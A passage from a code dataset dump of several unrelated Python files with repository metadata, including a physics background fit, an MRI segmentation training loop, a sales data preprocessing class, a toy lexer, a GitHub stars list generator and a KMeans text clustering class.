nBgOutBlinding < 10:\n\t\tnBgInBlinding=100000\n\t\tprint('Too few event to fit background (<10)')\n\n\terrNBg=np.maximum(abs(upperNBg-nBgInBlinding),abs(nBgInBlinding-lowerNBg))\n\t#print(f'Background: {nBgInBlinding} pm {errNBg}')\n\treturn nBgInBlinding,errNBg\n\n\n\n# Try without scaling function to reduce uncertainty\ndef fitBackgroundTry(XselectedBg,printPlotFit):\n\n\t# C,D,E Normalisation factors for easier fit:\n\tC=100\n\tE=5500\n\n\n\tbgMin=5500\n\tbgMax=6500\n\tsteps=21\n\tmassTab=np.linspace(bgMin,bgMax,steps)\t#X axis\n\n\tbinCenters=[(0.5*(massTab[i]+massTab[i+1])-E)/C for i in range (len(massTab)-1)] # X axis transformaion for easier fit\n\tmassB0=XselectedBg['B_s0_DTF_M']\n\tmassHist,binEdges=np.histogram(massB0,bins=massTab,density=False) \t# Histogram computation\n\tD=massHist[0]+1\t\t\t\t\t\t\t\t\t\t\t\t\t\t# +1 to avoid dividing by 0\n\tmassHist=massHist/D \t\t\t\t\t\t\t\t\t\t\t\t# Histogram normilised to be ~1 at x=0\n\n\tparams, paramCov = curve_fit(monoExp, binCenters, massHist,bounds=([0.0,0.0], [2.0, 2.0])) # Do the easier exponential fit\n\ta, b=params\n\tA=D*float(a)#*np.exp(float(b)*E/C)\n\tB=float(b)#/C\n\tdA=np.sqrt(paramCov[0][0])#*D*np.exp(B*E/C)\n\tdB=np.sqrt(paramCov[1][1])#/C\n\t#print(f'a: {a}, b: {b}, c:{c}')\n\t#print(f'paramCov: {paramCov}')\n\t#dA, dB, dC=paramCov # Estimated covarience on parameters\n\tif printPlotFit:\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \n\t\tax.plot(binCenters,massHist,'k.',label=f'Mass Histogram')\n\t\tax.plot(binCenters,monoExp(np.array(binCenters),*params),'b--', # * in call to expands the tuple into separate elements\n\t\t\t\t\t\t\t\t\tlabel=f'fit: N={\"{0:.4f}\".format(a)}*exp(-{\"{0:.4f}\".format(b)}*M)')\n\t\tplt.xlabel('B_0 mass')\n\t\tplt.ylabel('Number of events')\n\t\tplt.legend()\n\t\tplt.show()\n\t\tplt.close()\t\n\n\tblindingMin=(5100-E)/C\n\tblindingMax=(5500-E)/C\n\tnBgOutBlinding=len(massB0)\n\tmassWidth=(bgMax-bgMin)/(steps-1)/C\n\tnBgInBlinding=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A,paramExpB=B)#+ c*(blindingMax-blindingMin) )\n\tnBgExtremum1=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B+dB)\n\tnBgExtremum2=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B-dB)\n\tnBgExtremum3=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B-dB)\n\tnBgExtremum4=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B+dB)\n\t\n\tprint(f'nBgInBlinding:{nBgInBlinding}')\n\tprint(f'nBgExtremum1:{nBgExtremum1}')\n\tprint(f'nBgExtremum2:{nBgExtremum2}')\n\tprint(f'nBgExtremum3:{nBgExtremum3}')\n\tprint(f'nBgExtremum4:{nBgExtremum4}')\n\n\n\n\t#if( (upperNBgnBgcheck1)|(lowerNBg>nBgcheck2) ):\n\t#\tprint(\"ERROR in uncertainty computation, min/max are not extremums.\")\n\t#print(f'Rapport {nBgInBlinding/nBgOutBlinding} between Inside {nBgInBlinding} and outside bliding: {nBgOutBlinding}')\n\tif nBgOutBlinding < 10:\n\t\tnBgInBlinding=100000\n\t\tprint('Too few event to fit background (<10)')\n\n\tupperNBg=np.amax([nBgExtremum1,nBgExtremum2,nBgExtremum3,nBgExtremum4])\n\tlowerNBg=np.amin([nBgExtremum1,nBgExtremum2,nBgExtremum3,nBgExtremum4])\n\n\terrNBg=np.maximum(abs(upperNBg-nBgInBlinding),abs(nBgInBlinding-lowerNBg))\n\tprint(f'Background: {nBgInBlinding} pm {errNBg}')\n\treturn nBgInBlinding,errNBg","repo_name":"marcjacquart/TP4b","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":8734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37463202643","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\nimport pickle\nimport argparse\nimport random\nfrom utils import (\n MRISegConfigParser,\n save_model,\n load_data,\n train,\n validate,\n create_dir\n )\n\nfrom torch.utils.data import DataLoader\nfrom factory.scheduler import PolynomialLR\nfrom losses import losses\nfrom model import vaereg\nfrom datasets.data_loader import BraTSDataset\n\n\"\"\"\nUsage:\n\npython train.py --config ./config/test.cfg --model_name ./checkpoints_aug/ --gpu 3\npython train.py --config ./config/test.cfg --model_name ./checkpoints_bilinear/ --gpu 3 --upsampling bilinear\npython train.py --config ./config/test.cfg --model_name ./checkpoints_2branch/ --gpu 1\n\n\"\"\"\n\n\nparser = argparse.ArgumentParser(description='Train MRI segmentation model.')\nparser.add_argument('--config')\nparser.add_argument('--upsampling', type=str, default='bilinear', choices=['bilinear', 'deconv'])\nargs = parser.parse_args()\nconfig = MRISegConfigParser(args.config)\n\ndevice = torch.device('cuda')\n\nfor d in ['checkpoints', config.log_dir]:\n create_dir(d, config.model_name)\n\nif config.deterministic_train:\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n# TODO: just pass config and figure it out\n#brats_data = BraTSDataset(config.data_dir, config.labels, modes=config.modes, debug=True)\n#train, test = torch.utils.data.random_split(brats_data, [8, 2]) \n#trainp = 228\n#testp = 57\ntrainp = 285\ntestp = 0\n\nbrats_data = BraTSDataset(config.data_dir, modes=config.modes, debug=config.debug, dims=config.dims)\n#train_split, test_split = torch.utils.data.random_split(brats_data, [trainp, testp]) \n#\n#trainloader = DataLoader(train_split, batch_size=1, shuffle=True, num_workers=0)\n#testloader = DataLoader(test_split, batch_size=1, shuffle=True, num_workers=0)\ntrainloader = DataLoader(brats_data, batch_size=1, shuffle=True, num_workers=0)\ntestloader = None\n# specify in config?\ninput_channels = len(config.modes)\noutput_channels = len(config.labels)\n#output_channels = len(config.labels) + 1\n\n# TODO: Replace with builder.\nif config.model_type == 'baseline':\n model = vaereg.UNet()\n model = model.to(device)\nif config.model_type == 'reconreg':\n model = vaereg.ReconReg()\n model = model.to(device)\nif config.model_type == 'vaereg':\n model = vaereg.VAEreg()\n\n# TODO: optimizer factory\n#optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=0.1)\n#optimizer = optim.Adam(model.parameters(), lr=1e-4, weight_decay=0.1)\n# model_name = config.model_name\noptimizer = \\\n optim.Adam(model.parameters(), lr=1e-4, weight_decay=config.weight_decay)\n\nwriter = SummaryWriter(log_dir=config.log_dir+config.model_name+'/')\nscheduler = PolynomialLR(optimizer, config.epochs)\nloss = losses.build(config)\n\nfor epoch in range(1, config.epochs):\n train(model, loss, optimizer, trainloader, device)\n \n #Only validate every x epochs\n if epoch % 5 != 0:\n scheduler.step()\n continue\n\n train_dice, train_dice_agg, train_loss, test_dice, test_dice_agg, test_loss =\\\n validate(model, loss, trainloader, testloader, device)\n\n # Log validation\n writer.add_scalar('Loss/train', train_loss, epoch)\n writer.add_scalar('Dice/train/ncr&net', train_dice[0], epoch)\n writer.add_scalar('Dice/train/ed', train_dice[1], epoch)\n writer.add_scalar('Dice/train/et', train_dice[2], epoch)\n writer.add_scalar('Dice/train/et_agg', train_dice_agg[0], epoch)\n writer.add_scalar('Dice/train/wt_agg', train_dice_agg[1], epoch)\n writer.add_scalar('Dice/train/tc_agg', train_dice_agg[2], epoch)\n\n if test_dice and test_loss:\n writer.add_scalar('Loss/test', test_loss, epoch)\n writer.add_scalar('Dice/test/ncr&net', test_dice[0], epoch)\n writer.add_scalar('Dice/test/ed', test_dice[1], epoch)\n writer.add_scalar('Dice/test/et', test_dice[2], epoch)\n # TODO: make this just test and add agg score\n print(\"epoch: {}\\ttrain loss: {}\\ttrain dice: {}\\t\\\n test loss: {}\\t test dice: {}\".format(epoch, train_loss, \n [ d.item() for d in train_dice ], test_loss, [ d.item() for d in test_dice ])) \n print(\"epoch: {} ||| train loss: {} ||| train dice: {} ||| train dice agg: {}\".format(epoch, \n train_loss, [ d.item() for d in train_dice ], [ d.item() for d in train_dice_agg ])) \n save_model(config.model_name, epoch, writer, model, optimizer) \n scheduler.step()\n \n","repo_name":"KelestZ/vae-reg-brainseg","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17899983966","text":"# /rules/tests/run_test.sh -r set_user_attribute_value -a \"jmelius,test,value\" -j\nimport irods_types # pylint: disable=import-error\n\nfrom datahubirodsruleset.decorator import make, Output\n\n\n@make(inputs=[0, 1, 2], outputs=[], handler=Output.STORE)\ndef set_user_attribute_value(ctx, username, attribute, value):\n \"\"\"\n Set an attribute value to the input user\n\n Parameters\n ----------\n ctx : Context\n Combined type of callback and rei struct.\n username : str\n The username\n attribute : str\n The user attribute to set\n value : str\n The user attribute's value to set\n\n Returns\n -------\n dict\n The attribute value\n \"\"\"\n kvp = ctx.callback.msiString2KeyValPair(\"{}={}\".format(attribute, value), irods_types.BytesBuf())[\"arguments\"][1]\n ctx.callback.msiSetKeyValuePairsToObj(kvp, username, \"-u\")\n ctx.callback.msiWriteRodsLog(\"INFO: {}: Setting '{}' to '{}'\".format(username, attribute, value), 0)\n","repo_name":"MaastrichtUniversity/irods-ruleset","sub_path":"datahubirodsruleset/users/set_user_attribute_value.py","file_name":"set_user_attribute_value.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"40223156186","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport sys\n\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.preprocessing import LabelEncoder\n\ndef preprocess(train_store, test):\n # since competition open since have similar meanings we can merge into once\n train_store['CompetitionOpenSince'] = np.where((train_store['CompetitionOpenSinceMonth'] == 0) & (train_store['CompetitionOpenSinceYear'] == 0), 0, (train_store.Month - train_store.CompetitionOpenSinceMonth) +\n (12 * (train_store.Year - train_store.CompetitionOpenSinceYear)))\n\n # we can get rid of `CompetitionOpenSinceYear` and `CompeitionOpenSinceMonth`\n del train_store['CompetitionOpenSinceYear']\n del train_store['CompetitionOpenSinceMonth']\n\n # data extraction\n # TODO: extract to sklearn pipelines\n test['Year'] = test.index.year\n test['Month'] = test.index.month\n test['Day'] = test.index.day\n test['WeekOfYear'] = test.index.weekofyear\n\n print(train_store.dtypes)\n # print(train_store[train_store['StateHoliday'].na()])\n # transform stateholiday\n train_store[\"StateHoliday\"] = train_store['StateHoliday'].map(\n {\"0\": 0, \"a\": 1, \"b\": 1, \"c\": 1})\n features = test.columns.tolist()\n features.pop(0)\n features_df = train_store[features]\n print(features_df.head())\n targets = np.log(train_store.Sales)\n print(targets)\n # targets = float(targets)\n return features_df, targets\n\nclass data_preprocess:\n def __init__(self) -> None:\n pass\n #log the initialization of a class here\n def get_numerical_columns(self, df):\n \"\"\"Get numerical columns from dataframe.\"\"\"\n \n num_col = df.select_dtypes(\n exclude=\"object\").columns.tolist()\n return num_col\n \n def get_categorical_columns(self, df):\n \"\"\"Get categorical columns from dataframe.\"\"\"\n return df.select_dtypes(\n include=\"object\").columns.tolist()\n \n def drop_duplicate(self, df: pd.DataFrame) -> pd.DataFrame:\n \n df = df.drop_duplicates(subset='Date')\n\n return df\n \n def get_missing_values(self, df):\n \n return df.isnull().sum()\n def convert_to_datetime(self, df, column):\n df[column] = pd.to_datetime(df[column])\n return df\n \n def is_weekend(self, date):\n\n return 1 if (date.weekday() > 4 or date.weekday() < 1) else 0\n \n def extract_fields_date(self, df, date_column):\n \n df['Year'] = df[date_column].dt.year\n df['Month'] = df[date_column].dt.month\n df['Day'] = df[date_column].dt.day\n df['DayOfWeek'] = df[date_column].dt.dayofweek\n df['weekday'] = df[date_column].dt.weekday\n df['weekofyear'] = df[date_column].dt.weekofyear\n df['weekend'] = df[date_column].apply(self.is_weekend)\n return df\n\n def label_encode(self, df, columns):\n\n label_encoded_columns = []\n # For loop for each columns\n for col in columns:\n # We define new label encoder to each new column\n le = LabelEncoder()\n # Encode our data and create new Dataframe of it,\n # notice that we gave column name in \"columns\" arguments\n column_dataframe = pd.DataFrame(\n le.fit_transform(df[col]), columns=[col])\n # and add new DataFrame to \"label_encoded_columns\" list\n label_encoded_columns.append(column_dataframe)\n\n # Merge all data frames\n label_encoded_columns = pd.concat(label_encoded_columns, axis=1)\n return label_encoded_columns\n\n def fill_missing_median(self, df, columns):\n \n for col in columns:\n df[col] = df[col].fillna(df[col].median())\n return df\n\n def get_missing_data_percentage(self, df):\n \n total = df.isnull().sum().sort_values(ascending=False)\n percent_1 = total/df.isnull().count()*100\n percent_2 = (round(percent_1, 1)).sort_values(ascending=False)\n missing_data = pd.concat(\n [total, percent_2], axis=1, keys=['Total', '%'])\n return missing_data\n \n def fill_missing_with_zero(self, df, columns):\n \n for col in columns:\n df[col] = df[col].fillna(0)\n return df\n\n def replace_outliers_iqr(self, df, columns):\n \n for col in columns:\n Q1, Q3 = df[col].quantile(\n 0.25), df[col].quantile(0.75)\n IQR = Q3 - Q1\n cut_off = IQR * 1.5\n lower, upper = Q1 - cut_off, Q3 + cut_off\n\n df[col] = np.where(\n df[col] > upper, upper, df[col])\n df[col] = np.where(\n df[col] < lower, lower, df[col])\n return df\n \n def fill_missing_mode(self, df, columns):\n for col in columns:\n df[col] = df[col].fillna(df[col].mode()[0])\n return df\n","repo_name":"michaelgetachew-abebe/Pharmaceutical-Sales-Prediction_Rossmann","sub_path":"scripts/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8864970598","text":"# --------------------------------\n# module: toy_lexical_tokens.py\n#\n# tokens for toy language\n# --------------------------------\n\nfrom ply.lex import TOKEN\n\n# List of token names\ntokens = (\n 'PLUS',\n 'MINUS',\n 'MULTI',\n 'EQUAL',\n 'LPAREN',\n 'RPAREN',\n 'SEMICOLON',\n 'ID',\n 'LITERAL'\n)\n\n# Simple token regex\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_MULTI = r'\\*'\nt_EQUAL = r'\\='\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_SEMICOLON = r'\\;'\nt_ID = r'([A-Za-z_]([A-Za-z_]|[0-9])*)'\n\n# More complex literal token\nliteral = r'(0|([1-9]([0-9]*)))'\n\n\n@TOKEN(literal)\ndef t_LITERAL(t):\n t.value = int(t.value)\n return t\n\n\n# Ignore whitespace and newline tokens\nt_ignore = ' \\n'\n\n\n# Error handling\ndef t_error(t):\n print(\"error\")\n t.lexer.skip(1)\n","repo_name":"hsilman/Toy_Interpreter_Python","sub_path":"toy_lexical_tokens.py","file_name":"toy_lexical_tokens.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20816481963","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom io import BytesIO\nfrom collections import OrderedDict\nimport click\nfrom github3 import GitHub\n\n\ndesc = '''# MyStars\n\n\n## Contents\n'''\n\nlicense_ = '''\n## License\n\n[![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)]\\\n(https://creativecommons.org/publicdomain/zero/1.0/)\n\nTo the extent possible under law, [{username}](https://github.com/{username})\\\n has waived all copyright and related or neighboring rights to this work.\n'''\n\nhtml_escape_table = {\n \">\": \">\",\n \"<\": \"<\",\n}\n\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c, c) for c in text)\n\n\n@click.command()\n@click.option('--username', envvar='USER', help='GitHub username')\n@click.option('--token', envvar='GITHUB_TOKEN', help='GitHub token')\n@click.option('--sort', is_flag=True, help='sort by language')\n@click.option('--repository', default='', help='repository name')\n@click.option('--message', default='update stars', help='commit message')\n@click.version_option(version='1.3.1', prog_name='starred')\ndef starred(username, token, sort, repository, message):\n \"\"\"GitHub starred\n\n creating your own Awesome List used GitHub stars!\n\n example:\n starred --username maguowei --sort > README.md\n \"\"\"\n if repository:\n if not token:\n click.secho('Error: create repository need set --token', fg='red')\n return\n file = BytesIO()\n sys.stdout = file\n else:\n file = None\n\n gh = GitHub(token=token)\n stars = gh.starred_by(username)\n click.echo(desc)\n repo_dict = {}\n\n for s in stars:\n language = s.language or 'Others'\n description = html_escape(s.description).replace('\\n', '') if s.description else ''\n if language not in repo_dict:\n repo_dict[language] = []\n repo_dict[language].append([s.name, s.html_url, description.strip()])\n\n if sort:\n repo_dict = OrderedDict(sorted(repo_dict.items(), key=lambda l: l[0]))\n\n for language in repo_dict.keys():\n data = u' - [{}](#{})'.format(language, language.lower())\n click.echo(data)\n click.echo('')\n\n for language in repo_dict:\n click.echo('## {} \\n'.format(language.replace('#', '# #')))\n for repo in repo_dict[language]:\n data = u'- [{}]({}) - {}'.format(*repo)\n click.echo(data)\n click.echo('')\n\n click.echo(license_.format(username=username))\n\n if file:\n rep = gh.repository(username, repository)\n if rep:\n readme = rep.readme()\n readme.update(message, file.getvalue())\n else:\n rep = gh.create_repository(repository, 'A curated list of my GitHub stars!')\n rep.create_file('README.md', 'starred initial commit', file.getvalue())\n click.launch(rep.html_url)\n\nif __name__ == '__main__':\n starred()\n","repo_name":"flyfei/starred-build","sub_path":"starred.py","file_name":"starred.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70034099245","text":"from torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils.model_config import Config\nfrom label_aware import MulCon\nfrom Dataset import get_labels_vocab\nfrom Dataset import multi_intent_dataset, aktify_multi_intent_dataset\nfrom transformers import BertTokenizer\nimport torch\nfrom utils.metrics import calc_score,f1_score_intents\n\n# path = \"/Users/yurunsong/Desktop/Multi-Intent/Multi-Intents-Detection/data/MixSNIPS_clean\"\npath = \"/home/song/Desktop/Multi-Intents-Detection/data/Aktify\"\n\nconfig = Config()\n\nlabels = get_labels_vocab(config, path)\nprint(labels)\n\nmodel = MulCon(config, labels)\n\nlr = 1e-5\nopt = torch.optim.AdamW(model.parameters(), lr, betas=(0.9, 0.999), eps=1e-08, weight_decay=1e-2)\nepochs = 50\n\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\ntrain_dataset = aktify_multi_intent_dataset(path, \"train\", tokenizer)\ntest_dataset = aktify_multi_intent_dataset(path, \"test\", tokenizer)\n\ntrain_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=2, shuffle=False)\ntest_data_loader = torch.utils.data.DataLoader(test_dataset, batch_size=2, shuffle=False)\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\nmodel = model.to(device)\n\ni = 0\nwhile i < epochs:\n\tmodel.train()\n\ttrain_loss = []\n\ttest_loss = []\n\n\tfor i, data in enumerate(train_data_loader):\n\t\topt.zero_grad()\n\t\tx_utter = data[\"input_ids\"].to(device)\n\t\tx_mask = data[\"attention_mask\"].to(device)\n\t\ty_labels = data[\"intent\"].to(device)\n\t\toutput = model(x_utter,x_mask,y_labels)\n\t\t# print(loss1)\n\t\t# print(loss2)\n\t\t# loss = loss1 * 0.5 + loss2 * 0.5\n\t\toutput[0].backward()\n\t\topt.step()\n\t\ttrain_loss.append(output[0].item())\n\n\tmodel.eval()\n\n\twith torch.no_grad():\n\t\tfor i, batch in enumerate(test_data_loader):\n\t\t\tinput_ids = batch[\"input_ids\"].to(device)\n\t\t\tattention_mask = batch[\"attention_mask\"].to(device)\n\t\t\tlabels = batch[\"intent\"].to(device)\n\t\t\toutput = model(input_ids, attention_mask, labels)\n\t\t\tlogits = output[1]\n\t\t\tloss = output[0]\n\t\t\t_, _, _, acc = calc_score(logits, labels)\n\t\t\tP, R, f1, _ = f1_score_intents(logits, labels)\n\t\t\tacc /= input_ids.size(0)\n\t\t\ttest_loss.append(output[0].item())\n\n\tprint(f\"loss {loss}\")\n\tprint(f\"acc: {acc}\")\n\n\ti+= 1\n","repo_name":"zjc664656505/PCMID","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44859535113","text":"import ipdb\nimport numpy as np\nimport os\nfrom multiprocessing import Process, Queue, Lock\nfrom moviepy.video.io.ImageSequenceClip import ImageSequenceClip\nimport skvideo.measure as skv\nfrom glob import glob\nimport csv\nfrom tqdm import tqdm\nfrom cvbase.optflow.visualize import flow2rgb\nfrom cvbase.optflow.io import read_flow\nimport torch\n\n\ndef make_uint8(im):\n return (255 * im).astype('uint8')\n\n\ndef normalize_flows(vid, newmin=-1, newmax=1):\n minval = vid.min()\n maxval = vid.max()\n return (newmax-newmin)/(maxval-minval)*(vid-minval)+newmin\n\n\ndef job(item):\n fn = item\n outpath = os.path.join(fn, 'flow.mp4')\n if not os.path.exists(outpath):\n flows = torch.stack([torch.from_numpy(read_flow(_))\n for _ in glob(os.path.join(fn, '*.flo'))])\n flows = list(normalize_flows(flows))\n flows = list(flows)\n rgb_flows = [make_uint8(flow2rgb(_.numpy())) for _ in flows]\n vid = ImageSequenceClip(\n rgb_flows, fps=8)\n vid.write_videofile(outpath, fps=8, verbose=False, logger=None)\n vid.close()\n\n\ndef worker(inq, outq, lock):\n for item in iter(inq.get, None):\n job(item)\n outq.put(0)\n\n\nif __name__ == \"__main__\":\n inq = Queue()\n outq = Queue()\n lock = Lock()\n nproc = 3\n basepath = \"YOUR PATH HERE\"\n data = glob(os.path.join(basepath, '*'))\n for item in data:\n inq.put((item))\n for i in range(nproc):\n inq.put(None)\n for i in range(nproc):\n Process(target=worker, args=(inq, outq, lock)).start()\n c = 0\n for item in tqdm(data):\n outq.get()\n","repo_name":"cvlab-columbia/oops","sub_path":"utils/flow_imgs_to_vids.py","file_name":"flow_imgs_to_vids.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"19"} +{"seq_id":"14155832143","text":"import pickle\n\ndata = [{'name': 'John', 'age': 25, 'gender': 'Male'}]\n# pickling write binary, read binary\nwith open(\"data\", 'wb') as f:\n pickle.dump(data, f)\nprint(\">>>\", pickle)\nwith open('data', 'rb') as f:\n new_data = pickle.load(f)\nprint(new_data)","repo_name":"Santosh-Kumar29/study_python_ds","sub_path":"pickling_unpickling.py","file_name":"pickling_unpickling.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33531127347","text":"from __future__ import absolute_import\nimport requests\nimport json\n\n\nfrom celery import shared_task\n\n\n@shared_task\ndef fetch_schedule(bind=True):\n r = requests.get('http://schedule.assembly.org/asms15/schedules/events.json')\n if (r.status_code == 200):\n data = r.json()\n with open('./media/uploads/schedule/events.json', 'w') as f:\n json.dump(data, f)\n return \"Fetched schedule\"\n else:\n raise r.text\n","repo_name":"Assembly-WebCrew/cms","sub_path":"assembly/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13620043247","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\nCreate on 2020/9/28 4:13 下午\n@Author: dfsj\n@Description: Kmeans 文本聚类\n\"\"\"\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer, HashingVectorizer, TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\nfrom config import *\n\n\nclass KMEANS:\n \"\"\" KMeans 文本聚类算法 \"\"\"\n\n vectorizer = None\n X = None\n km = None\n svd = None\n\n def __init__(self, texts, num_clusters=10, minibatch=True, n_components=100,\n n_features=250000, use_hashing=False, use_idf=True):\n \"\"\"\n :param texts: 聚类文本\n :param num_clusters: 聚类数\n :param minibatch: 是否是否 MiniBatchKMeans\n :param n_components: 使用潜在语义分析处理文档,可以设置为 None 不进行压缩\n :param n_features: 特征(维度)的最大数量,特征压缩,只用于 hash 特征表示\n :param use_hashing: hash 特征向量\n :param use_idf: 是否使用逆文档频率特征\n \"\"\"\n self.texts = texts\n self.num_clusters = num_clusters\n self.minibatch = minibatch\n self.n_components = n_components\n self.n_features = n_features\n self.use_hashing = use_hashing\n self.use_idf = use_idf\n self.text2vec()\n\n def text2vec(self):\n \"\"\" 文本向量化表示 \"\"\"\n if self.use_hashing:\n if self.use_idf:\n # Perform an IDF normalization on the output of HashingVectorizer\n hasher = HashingVectorizer(n_features=self.n_features, alternate_sign=False, norm=None)\n self.vectorizer = make_pipeline(hasher, TfidfTransformer())\n else:\n self.vectorizer = HashingVectorizer(n_features=self.n_features, alternate_sign=False, norm='l2')\n else:\n self.vectorizer = TfidfVectorizer(max_df=0.5, min_df=2, use_idf=self.use_idf)\n self.X = self.vectorizer.fit_transform(self.texts)\n logger.info(\"n_samples: %d, n_features: %d\" % self.X.shape)\n\n if self.n_components:\n logger.info(\"Performing dimensionality reduction using LSA\")\n # Vectorizer results are normalized, which makes KMeans behave as\n # spherical k-means for better results. Since LSA/SVD results are\n # not normalized, we have to redo the normalization.\n self.svd = TruncatedSVD(self.n_components)\n normalizer = Normalizer(copy=False)\n lsa = make_pipeline(self.svd, normalizer)\n self.X = lsa.fit_transform(self.X)\n explained_variance = self.svd.explained_variance_ratio_.sum()\n logger.info(\"Explained variance of the SVD step: {}%\".format(int(explained_variance * 100)))\n\n def train(self):\n if self.minibatch:\n self.km = MiniBatchKMeans(n_clusters=self.num_clusters, init='k-means++', n_init=1,\n init_size=1000, batch_size=1000, verbose=False)\n else:\n self.km = KMeans(n_clusters=self.num_clusters, init='k-means++', max_iter=100, n_init=1, verbose=False)\n\n self.km.fit(self.X)\n return self.km\n\n def print_top_terms(self, top_n=10):\n if not self.use_hashing:\n if not self.km:\n _ = self.train()\n logger.info(\"Top terms per cluster:\")\n if self.n_components:\n original_space_centroids = self.svd.inverse_transform(self.km.cluster_centers_)\n order_centroids = original_space_centroids.argsort()[:, ::-1]\n else:\n order_centroids = self.km.cluster_centers_.argsort()[:, ::-1]\n\n terms = self.vectorizer.get_feature_names()\n for i in range(self.num_clusters):\n res = []\n for ind in order_centroids[i, :top_n]:\n res.append(terms[ind])\n logger.info(\"Cluster {}: {}\".format(i, \" \".join(res)))\n else:\n logger.warning(\"hash 编码方式不支持该方法\")\n\n def print_summary(self, labels=None):\n \"\"\" labels 为该数据集的真实类别标签,真实数据可能不存在该标签,因此部分指标可能不可用 \"\"\"\n if not self.km:\n _ = self.train()\n if labels is not None:\n logger.info(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(labels, self.km.labels_))\n logger.info(\"Completeness: %0.3f\" % metrics.completeness_score(labels, self.km.labels_))\n logger.info(\"V-measure: %0.3f\" % metrics.v_measure_score(labels, self.km.labels_))\n logger.info(\"Adjusted Rand-Index: %.3f\" % metrics.adjusted_rand_score(labels, self.km.labels_))\n logger.info(\"Silhouette Coefficient: %0.3f\" %\n metrics.silhouette_score(self.X, self.km.labels_, metric='euclidean'))\n\n result = list(self.km.predict(self.X))\n logger.info('Cluster distribution:')\n logger.info(dict([(i, result.count(i)) for i in result]))\n logger.info(-self.km.score(self.X))\n\n def find_optimal_clusters(self, max_k):\n iters = range(2, max_k + 1, 2)\n\n sse = []\n for k in iters:\n sse.append(\n MiniBatchKMeans(n_clusters=k, init=\"k-means++\", init_size=1024, batch_size=2048, random_state=20).fit(\n self.X).inertia_)\n logger.info('Fit {} clusters'.format(k))\n\n f, ax = plt.subplots(1, 1)\n ax.plot(iters, sse, marker='o')\n ax.set_xlabel('Cluster Centers')\n ax.set_xticks(iters)\n ax.set_xticklabels(iters)\n ax.set_ylabel('SSE')\n ax.set_title('SSE by Cluster Center Plot')\n plt.savefig(PIC_KMEANS)\n","repo_name":"dfsj66011/text_cluster","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"19"} +{"seq_id":"42108708829","text":"import pytest\nimport os\nfrom unittest.mock import patch, MagicMock\nfrom yandextank.plugins.DataUploader.ycloud import JwtTokenRequester, load_sa_key, build_sa_key, SAKey, \\\n JWTError, AuthTokenProvider, _get_host_port_from_url\nfrom yandextank.common.util import get_test_path\n\nRAW_KEY_FILE_PATH = os.path.join(get_test_path(), 'yandextank/plugins/DataUploader/tests/test_ycloud/raw_key.txt')\nJSON_KEY_FILE_PATH = os.path.join(get_test_path(), 